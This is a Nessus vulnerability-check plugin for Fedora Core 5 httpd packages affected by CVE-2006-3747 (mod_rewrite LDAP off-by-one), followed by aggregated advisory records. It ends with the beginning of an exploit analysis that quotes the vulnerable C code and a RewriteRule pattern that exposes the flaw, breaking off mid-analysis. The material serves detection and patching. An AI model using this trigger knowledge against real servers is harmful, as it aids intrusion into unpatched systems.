ID FEDORA_2006-863.NASL Type nessus Reporter This script is Copyright (C) 2007-2021 Tenable Network Security, Inc. Modified 2007-01-17T00:00:00
Description
This update fixes a security issue in the mod_rewrite module.
Mark Dowd of McAfee Avert Labs reported an off-by-one security problem
in the LDAP scheme handling of the mod_rewrite module. Where
RewriteEngine was enabled, and for certain RewriteRules, this could
lead to a pointer being written out of bounds. (CVE-2006-3747)
The ability to exploit this issue is dependent on the stack layout for
a particular compiled version of mod_rewrite. The Fedora project has
analyzed Fedora Core 4 and 5 binaries and determined that these
distributions are vulnerable to this issue. However this flaw does not
affect a default installation of Fedora Core; users who do not use, or
have not enabled, the Rewrite module are not affected by this issue.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2006-863.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
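# Plugin registration branch: entered when `description` is set. It records
# the plugin's identity, advisory text and prerequisites, then leaves through
# the exit(0) at the end, so none of the host checks further down run here.
if (description)
{
  script_id(24162);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");

  # Register the CVE as a structured reference. It was previously mentioned
  # only inside the free-text description, where CVE-based filtering and
  # reporting cannot rely on it.
  script_cve_id("CVE-2006-3747");
  script_xref(name:"FEDORA", value:"2006-863");

  script_name(english:"Fedora Core 5 : httpd-2.2.2-1.2 (2006-863)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora Core host is missing a security update."
  );
  # The description is a multi-line string literal: its lines stay at column 0
  # because any added indentation would become part of the reported text.
  script_set_attribute(
    attribute:"description",
    value:
"This update fixes a security issue in the mod_rewrite module.
Mark Dowd of McAfee Avert Labs reported an off-by-one security problem
in the LDAP scheme handling of the mod_rewrite module. Where
RewriteEngine was enabled, and for certain RewriteRules, this could
lead to a pointer being written out of bounds. (CVE-2006-3747)
The ability to exploit this issue is dependent on the stack layout for
a particular compiled version of mod_rewrite. The Fedora project has
analyzed Fedora Core 4 and 5 binaries and determined that these
distributions are vulnerable to this issue. However this flaw does not
affect a default installation of Fedora Core; users who do not use, or
have not enabled, the Rewrite module are not affected by this issue.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2006-July/000463.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?90802964"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_attribute(attribute:"risk_factor", value:"High");

  # "local": the result comes from data collected on the host (the RPM list),
  # not from probing the web server over the network.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:httpd-manual");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:mod_ssl");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora_core:5");

  script_set_attribute(attribute:"patch_publication_date", value:"2006/07/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/01/17");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  # The three KB keys required here are the same ones the check section reads,
  # so the plugin is only scheduled once ssh_get_info.nasl has had the chance
  # to populate them.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}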
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Preconditions for the package check. Each failed condition hands control to
# audit(), which is defined in audit.inc (not shown here) and is expected to
# end the script with the given reason; the statements below rely on that.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# The host must identify itself as Fedora in the stored release string.
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release)
{
  audit(AUDIT_OS_NOT, "Fedora");
}

# Extract the numeric release; capture group 1 holds the digits.
ver_match = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(ver_match))
{
  audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
}
os_ver = ver_match[1];

# Only release 5 is in scope: "5" must be followed by a non-digit or the end
# of the string, so values such as "50" do not match.
if (! ereg(pattern:"^5([^0-9]|$)", string:os_ver))
{
  audit(AUDIT_OS_NOT, "Fedora 5.x", "Fedora " + os_ver);
}

# Without a collected RPM list there is nothing to compare against.
if (!get_kb_item("Host/RedHat/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Package references are only evaluated for x86_64 and i386-i686 hosts.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$")
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
}
# Compare each package from the advisory against the fixed build.
# rpm_check() comes from rpm.inc (not shown here); presumably it returns true
# when the installed package predates the reference - confirm against rpm.inc.
# Every reference is evaluated, with no early exit, and in the advisory's
# order.
#
# NOTE(review): this is a package-version check only. It does not look at
# whether mod_rewrite is loaded or RewriteEngine is enabled, which the
# advisory text names as the condition for being affected, so a finding means
# "patch missing" rather than "configuration exposed".
flag = 0;
fixed_rpms = make_list(
  "httpd-2.2.2-1.2",
  "httpd-debuginfo-2.2.2-1.2",
  "httpd-devel-2.2.2-1.2",
  "httpd-manual-2.2.2-1.2",
  "mod_ssl-2.2.2-1.2"
);
foreach fixed_rpm (fixed_rpms)
{
  if (rpm_check(release:"FC5", reference:fixed_rpm)) flag++;
}

# At least one reference matched: report the finding and stop.
if (flag)
{
  if (report_verbosity > 0)
  {
    # Verbose reports carry the per-package text built by rpm.inc.
    security_hole(port:0, extra:rpm_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}

# Nothing matched: separate "tested and not affected" from "none of the
# packages is installed".
tested = pkg_tests_get();
if (tested)
{
  audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
}
else
{
  audit(AUDIT_PACKAGE_NOT_INSTALLED, "httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl");
}
{"id": "FEDORA_2006-863.NASL", "bulletinFamily": "scanner", "title": "Fedora Core 5 : httpd-2.2.2-1.2 (2006-863)", "description": "This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2007-01-17T00:00:00", "modified": "2007-01-17T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/24162", "reporter": "This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?90802964"], "cvelist": ["CVE-2006-3747"], "type": "nessus", "lastseen": "2021-01-12T10:06:00", "edition": 22, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3747"]}, {"type": "f5", "idList": ["F5:K6878", "SOL6878"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13661", "SECURITYVULNS:DOC:13975", "SECURITYVULNS:DOC:13673"]}, {"type": "osvdb", "idList": ["OSVDB:27588"]}, {"type": "seebug", "idList": ["SSV:6610", "SSV:429", "SSV:63874", "SSV:16391"]}, {"type": "slackware", "idList": ["SSA-2006-209-01"]}, {"type": "saint", "idList": ["SAINT:35A5AA91DCF68555669689272BFFD3E7", "SAINT:386ECCECD3AA34FA1E84E6D3D2B71C7B", "SAINT:B572402CE6E5C851D7572BF044507A14"]}, {"type": "nessus", "idList": ["SUSE_APACHE2-1905.NASL", "FREEBSD_PKG_DC8C08C71E7C11DB88CF000C6EC775D9.NASL", "DEBIAN_DSA-1131.NASL", "GENTOO_GLSA-200608-01.NASL", "UBUNTU_USN-328-1.NASL", "DEBIAN_DSA-1132.NASL", "SLACKWARE_SSA_2006-209-01.NASL", "APACHE_1_3_37.NASL", "APACHE_2_0_59.NASL", "FEDORA_2006-862.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:57201", "OPENVAS:136141256231057168", "OPENVAS:57851", "OPENVAS:57145", "OPENVAS:57200", "OPENVAS:65142", "OPENVAS:136141256231065309", "OPENVAS:57168", "OPENVAS:65309", "OPENVAS:136141256231065142"]}, {"type": "exploitdb", "idList": ["EDB-ID:3996", "EDB-ID:16752", "EDB-ID:3680", "EDB-ID:2237"]}, {"type": "httpd", "idList": ["HTTPD:72F2F52813642A1A16F01F74291257B4", "HTTPD:6C9DAB876E616F2E0DD054F6CAEC074D", "HTTPD:926B81EFA0651C6A6A14D204526A10AC", 
"HTTPD:0D1550F3E416AE3560367A9812052A33"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:55727", "PACKETSTORM:83108", "PACKETSTORM:56989", "PACKETSTORM:62377", "PACKETSTORM:49400"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8FEEBCD1B617ED74B8D2179061252A44", "EXPLOITPACK:6E3090CD46CEEE08D52992589E824D90"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1132-1:6E37C", "DEBIAN:DSA-1131-1:123B5"]}, {"type": "freebsd", "idList": ["DC8C08C7-1E7C-11DB-88CF-000C6EC775D9"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/APACHE_MOD_REWRITE_LDAP"]}, {"type": "gentoo", "idList": ["GLSA-200608-01"]}, {"type": "ubuntu", "idList": ["USN-328-1"]}, {"type": "suse", "idList": ["SUSE-SA:2006:043"]}, {"type": "cert", "idList": ["VU:395412"]}, {"type": "fedora", "idList": ["FEDORA:L62F1CGQ016053"]}], "modified": "2021-01-12T10:06:00", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-01-12T10:06:00", "rev": 2}, "vulnersScore": 7.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-863.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24162);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-863\");\n\n script_name(english:\"Fedora Core 5 : httpd-2.2.2-1.2 (2006-863)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. 
Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-July/000463.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90802964\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"httpd-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"httpd-debuginfo-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"httpd-devel-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"httpd-manual-2.2.2-1.2\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"mod_ssl-2.2.2-1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "naslFamily": "Fedora Local Security 
Checks", "pluginID": "24162", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "cpe:/o:fedoraproject:fedora_core:5", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", "p-cpe:/a:fedoraproject:fedora:mod_ssl"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:48:16", "description": "Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.", "edition": 5, "cvss3": {}, "published": "2006-07-28T18:02:00", "title": "CVE-2006-3747", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3747"], "modified": "2018-10-17T21:29:00", "cpe": ["cpe:/a:apache:http_server:1.3.33", "cpe:/a:apache:http_server:1.3.3", "cpe:/a:apache:http_server:2.0.56", "cpe:/a:apache:http_server:2.0.49", "cpe:/a:apache:http_server:2.0.53", "cpe:/a:apache:http_server:2.0.50", "cpe:/o:ubuntu:ubuntu_linux:6.06_lts", "cpe:/a:apache:http_server:2.0.58", "cpe:/a:apache:http_server:1.3.6", "cpe:/a:apache:http_server:1.3.30", "cpe:/a:apache:http_server:2.0.55", "cpe:/a:apache:http_server:2.0.57", "cpe:/a:apache:http_server:1.3.28", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:apache:http_server:2.0.46", "cpe:/a:apache:http_server:1.3.5", "cpe:/a:apache:http_server:1.3.4", "cpe:/a:apache:http_server:1.3.7", "cpe:/a:apache:http_server:1.3.8", "cpe:/o:ubuntu:ubuntu_linux:5.10", "cpe:/a:apache:http_server:1.3.31", "cpe:/a:apache:http_server:2.0.54", "cpe:/a:apache:http_server:1.3.32", "cpe:/a:apache:http_server:2.0.47", 
"cpe:/a:apache:http_server:1.3.29", "cpe:/a:apache:http_server:2.0.52", "cpe:/o:ubuntu:ubuntu_linux:5.04", "cpe:/a:apache:http_server:2.0.51", "cpe:/a:apache:http_server:1.3.9"], "id": "CVE-2006-3747", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3747", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:http_server:1.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:5.04:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:6.06_lts:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:dev:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-10-12T02:11:16", "bulletinFamily": 
"software", "cvelist": ["CVE-2006-3747"], "edition": 1, "description": "", "modified": "2016-01-09T02:26:00", "published": "2007-05-17T04:00:00", "href": "https://support.f5.com/csp/article/K6878", "id": "F5:K6878", "title": "Apache Rewrite module (mod_rewrite) vulnerabilities CVE-2006-3747", "type": "f5", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:16", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "edition": 1, "description": "This security advisory describes an off-by-one error, which means the bits are shifted to the left or the right by one value, in the LDAP scheme handling of the Apache Rewrite module. The vulnerability within the Apache Rewrite module allows remote attackers to cause a Denial of Service attack or use rewrite rules to add arbitrary code into URLs that the Apache Rewrite module did not handle correctly.\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747>\n", "modified": "2013-03-19T00:00:00", "published": "2007-05-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/800/sol6878.html", "id": "SOL6878", "title": "SOL6878 - Apache Rewrite module (mod_rewrite) vulnerabilities CVE-2006-3747", "type": "f5", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\r\n Apache HTTP Server 2.2.3 Released\r\n\r\nThe Apache Software Foundation and The Apache HTTP Server Project are\r\npleased to announce the release of version 2.2.3 of the Apache HTTP Server\r\n("Apache").\r\n\r\nThis version of Apache is principally a bug and security fix release. 
The\r\nfollowing potential security flaws are addressed;\r\n\r\n CVE-2006-3747: An off-by-one flaw exists in the Rewrite module,\r\n mod_rewrite, as shipped with Apache 1.3 since 1.3.28, 2.0 since 2.0.46,\r\n and 2.2 since 2.2.0.\r\n\r\nDepending on the manner in which Apache HTTP Server was compiled, this\r\nsoftware defect may result in a vulnerability which, in combination with\r\ncertain types of Rewrite rules in the web server configuration files,\r\ncould be triggered remotely. For vulnerable builds, the nature of the\r\nvulnerability can be denial of service (crashing of web server processes)\r\nor potentially allow arbitrary code execution. This issue has been rated\r\nas having important security impact by the Apache HTTP Server Security\r\nTeam.\r\n\r\nThis flaw does not affect a default installation of Apache HTTP Server.\r\nUsers who do not use, or have not enabled, the Rewrite module mod_rewrite\r\nare not affected by this issue. This issue only affects installations\r\nusing a Rewrite rule with the following characteristics:\r\n\r\n * The RewriteRule allows the attacker to control the initial part of the\r\n rewritten URL (for example if the substitution URL starts with $1)\r\n * The RewriteRule flags do NOT include any of the following flags:\r\n Forbidden (F), Gone (G), or NoEscape (NE).\r\n\r\nPlease note that ability to exploit this issue is dependent on the stack\r\nlayout for a particular compiled version of mod_rewrite. If the compiler\r\nused to compile Apache HTTP Server has added padding to the stack\r\nimmediately after the buffer being overwritten, it will not be possible to\r\nexploit this issue, and Apache HTTP Server will continue operating\r\nnormally.\r\n\r\nThe Apache HTTP Server project recommends that all users who have built\r\nApache from source apply the patch or upgrade to the latest level and\r\nrebuild. 
Providers of Apache-based web servers in pre-compiled form will\r\nbe able to determine if this vulnerability applies to their builds. That\r\ndetermination has no bearing on any other builds of Apache HTTP Server,\r\nand Apache HTTP Server users are urged to exercise caution and apply\r\npatches or upgrade unless they have specific instructions from the\r\nprovider of their web server. Statements from vendors can be obtained from\r\nthe US-CERT vulnerability note for this issue at:\r\n\r\n http://www.kb.cert.org/vuls/id/395412\r\n\r\nThe Apache HTTP Server project thanks Mark Dowd of McAfee Avert Labs for\r\nthe responsible reporting of this vulnerability.\r\n\r\nWe consider this release to be the best version of Apache available, and\r\nencourage users of all prior versions to upgrade.\r\n\r\nApache HTTP Server 2.2.3 is available for download from:\r\n\r\n http://httpd.apache.org/download.cgi\r\n\r\nApache 2.2 offers numerous enhancements, improvements, and performance\r\nboosts over the 2.0 codebase. For an overview of new features introduced\r\nsince 2.0 please see:\r\n\r\n http://httpd.apache.org/docs/2.2/new_features_2_2.html\r\n\r\nPlease see the CHANGES_2.2 file, linked from the download page, for a full\r\nlist of changes.\r\n\r\nApache HTTP Server 1.3.37 and 2.0.59 legacy releases are also available\r\nwith this security fix. See the appropriate CHANGES from the url above.\r\nThe Apache HTTP Project developers strongly encourage all users to\r\nmigrate to Apache 2.2, as only limited maintenance is performed on these\r\nlegacy versions.\r\n\r\nThis release includes the Apache Portable Runtime (APR) version 1.2.7\r\nbundled with the tar and zip distributions. The APR libraries libapr,\r\nlibaprutil, and (on Win32) libapriconv must all be updated to ensure\r\nbinary compatibility and address many known platform bugs.\r\n\r\nThis release builds on and extends the Apache 2.0 API. 
Modules written for\r\nApache 2.0 will need to be recompiled in order to run with Apache 2.2, but\r\nno substantial reworking should be necessary.\r\n\r\n http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/VERSIONING\r\n\r\nWhen upgrading or installing this version of Apache, please bear in mind\r\nthat if you intend to use Apache with one of the threaded MPMs, you must\r\nensure that any modules you will be using (and the libraries they depend\r\non) are thread-safe.\r\n\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "modified": "2006-07-28T00:00:00", "published": "2006-07-28T00:00:00", "id": "SECURITYVULNS:DOC:13673", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13673", "title": "[Full-disclosure] [Announcement] Apache HTTP Server 2.2.3 (2.0.59, 1.3.37) Released", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "\r\nPublic release date of POC/Exploit: 2006-08-20\r\nAuthor: Jacobo Avariento Gimeno\r\nCVE id: CVE-2006-3747\r\nBugtraq id: 19204\r\nCERT advisory: VU#395412\r\nSeverity: high\r\n\r\n\r\nIntroduction\r\n----\r\nOn July 28 2006 Mark Dowd (McAfee Avert Labs) reported a vulnerability\r\nfound in mod_rewrite apache module to the bugtraq mailing list.\r\nThe vulnerable function is escape_absolute_uri() and the problem only\r\ncould be arised when mod_rewrite is dealing with an LDAP URL, a\r\nmalformed LDAP URL could trigger an off-by-one overflow in certain\r\n(special) situations and a possible attacker could cause a\r\ndenial-of-service or execute arbitrary code with the privileges of\r\nthe apache user.\r\nTo exploit this vulnerability isn't necessary an 
LDAP-specific rule,\r\nbut must have a rule which the user can control the inital part of the\r\nremapped URL, i.e.: \r\n\r\nRewriteRule foo/(.*) $1\r\n\r\nAny version of the Apache HTTP server:\r\n * 1.3 branch: >1.3.28 and <1.3.37\r\n * 2.0 branch: >2.0.46 and <2.0.59\r\n * 2.2 branch: >2.2.0 and <2.2.3\r\nis vulnerable.\r\n\r\n\r\nAnalysis of the vulnerable code\r\n----\r\n\r\n 2696 /* escape absolute uri, which may or may not be path oriented.\r\n 2697 * So let's handle them differently.\r\n 2698 */\r\n 2699 static char *escape_absolute_uri(ap_pool *p, char *uri,\r\nunsigned scheme) \r\n 2700 {\r\n 2701 char *cp;\r\n 2702 ...\r\n ...\r\n 2727 /* special thing for ldap.\r\n 2728 * The parts are separated by question marks. From RFC 2255: \r\n 2729 * ldapurl = scheme "://" [hostport] ["/"\r\n 2730 * [dn ["?" [attributes] ["?" [scope]\r\n 2731 * ["?" [filter] ["?" extensions]]]]]]\r\n 2732 */ \r\n 2733 if (!strncasecmp(uri, "ldap", 4)) {\r\n 2734 char *token[5];\r\n 2735 int c = 0;\r\n 2736 \r\n 2737 token[0] = cp = ap_pstrdup(p, cp);\r\n 2738 while (*cp && c < 5) {\r\n 2739 if (*cp == '?') {\r\n 2740 token[++c] = cp + 1;\r\n 2741 *cp = '\0';\r\n 2742 }\r\n 2743 ++cp;\r\n 2744 }\r\n\r\nIn the case that an LDAP URI contains a fifth '?' 
